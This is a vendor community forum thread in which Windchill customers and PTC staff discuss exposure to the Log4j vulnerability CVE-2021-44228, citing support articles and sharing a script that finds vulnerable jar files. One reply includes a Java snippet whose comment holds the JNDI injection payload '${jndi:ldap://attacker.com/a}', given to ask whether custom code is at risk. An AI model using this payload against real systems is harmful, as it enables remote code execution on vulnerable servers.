cancel
Showing results for 
Search instead for 
Did you mean: 
cancel
Showing results for 
Search instead for 
Did you mean: 

We are happy to announce the new Windchill Customization board! Learn more.

Log4j vulnerability

ErikZabokrtsky
8-Gravel

Log4j vulnerability

Just opening this thread as I haven't seen it anywhere else. Have the been any talks about the log4j exploit and Windchill? We are on Windchill 11 so I would assume we are open to the vulnerability but haven't seen anything mentioning it anywhere on PTC's sites. Just looking to get ahead of this in any way possible.

Figured I would open this thread publicly instead of a support case as it is affecting everyone.

1 ACCEPTED SOLUTION

Accepted Solutions

Hi @ErikZabokrtsky .

 

As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team  has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.

 

Please refer to this mini-site in order to get the latest updates on this investigation.

 

In case of any issue or doubt, please contact our Technical Support team.

 

Thank you.

 

--JC

View solution in original post

15 REPLIES 15

good timing, i was just searching the ptc support site and could not find anything. we are on WC11.1 and the security team is looking for an immediate action. i am going to submit a high priority case to make sure ptc is aware of the issue.

PTC Technical Support Repose:
PTC R&D team and Security Team are actively working on priority for Log4j2 vulnerability CVE-2021-44228 reported.
The log4j version used by Windchill can detected by referring article. https://www.ptc.com/en/support/article/CS358667
PTC Security Experts will roll out an official communication soon about this CVE, its impact for customers & the next actions soon.

Pic-1.png

rleir
17-Peridot
(To:ScottMorris)

Scott

That article suggests that you look at this article: https://www.ptc.com/en/support/article/CS358789 which has some Immediate actions to take. It makes sense to do the Immediate actions .. immediately! Before thinking about how exactly the attacker will be exploiting Log4J.

Just my two cents. cheers -- Rick

Hi @ErikZabokrtsky .

 

As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team  has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.

 

Please refer to this mini-site in order to get the latest updates on this investigation.

 

In case of any issue or doubt, please contact our Technical Support team.

 

Thank you.

 

--JC


@Jean-Christophe wrote:

Hi @ErikZabokrtsky .

 

As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team  has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.


I hope they are also taking into account custom code like this:

WTPart part;
//part name = "${jndi:ldap://attacker.com/a}"
Logger log = LogR.getLogger(MyCustomClass.class.getName());
log.error("Is this an issue?? part name: " + part.getName());

Thank you for the suggestion, @RandyJones

 

Our security team has been extensively testing, but I will pass over your suggestion.

rhart
14-Alexandrite
(To:ErikZabokrtsky)

Hi @Jean-Christophe ,

Please could you pass on the question whether Office Workers are vulnerable, we found log4j-core-2.11.1.jar in Adobe Experience Manager (provided by PTC as part of Creo View Office Worker Adapters)

We can't find anything on regarding the workers the PTC support website.

Regards

Rob

Jean-Christophe
13-Aquamarine
(To:rhart)

Hi @rhart ,

 

Please be aware that we have created a minisite to act as a more comprehensive hub on this situation

 

I will pass over your question to the security team. In parallel, I encourage that you engage our support team for a closer assistance on your question


@Jean-Christophe wrote:

... In parallel, I encourage that you engage our support team for a closer assistance on your question


"Case Logger": https://www.ptc.com/en/support/case-logger 

rhart
14-Alexandrite
(To:VladimirN)

Case 16180288

Jean-Christophe
13-Aquamarine
(To:rhart)

Thank for for raising this question to our support staff.  We will publish the outcome of the investigation around Office Workers in the mini site once it is available.

Following is something one can use to find any jar file that contains the JndiLookup class or any class/path that contains the string JndiLookup.  Because it is using "grep -i" this is a case insensitive search. This is what we used to find "affected" jar files in our Solr install This is sh or bash.

cd /opt/ptc/Windchill/Solr/SolrServer
for jar in `find . -name '*.jar' -print`
do
  if [ "`jar tvf "$jar" | grep -i JndiLookup`" != "" ]; then
    echo Issue in $jar
  fi
done

 

Dear all, 

Do know if there is an impact on Windchill 11.0 M30 and older versions ? 

The PTC article CS358789 seems to only cover 11.1 to 12.x 

According to CS358667 it seems that these files are used there  ? 

Regards,

Haithem 

Hello @HaithemBouajila 

 

As stated in CS358789, Windchill 11.1 M020 and earlier(including 11.0 M030 and older versions) are using log4j 1.x, so it should be not vulnerable.
* PTC security teams is continuously monitors and analyzes supported Windchill releases for any reported critical or high CVE.
Please always check the latest CS358789 for updates.

 

3rd party bundled components may still be vulnerable, please:
Solr: Refer to CS359011, Solr of old Windchill releases (10.1, 10.2, 11.0) is not impacted by CVE-2021-44228.
Cognos: Refer to CS359007 and IBM update page An update on the Apache Log4j CVE-2021044228 vulnerability.
Tibco: Refer to CS359008 and TIBCO published article: TIBCO Log4j Vunerability Daily Update.

 

Thanks,

Susan

 

Top Tags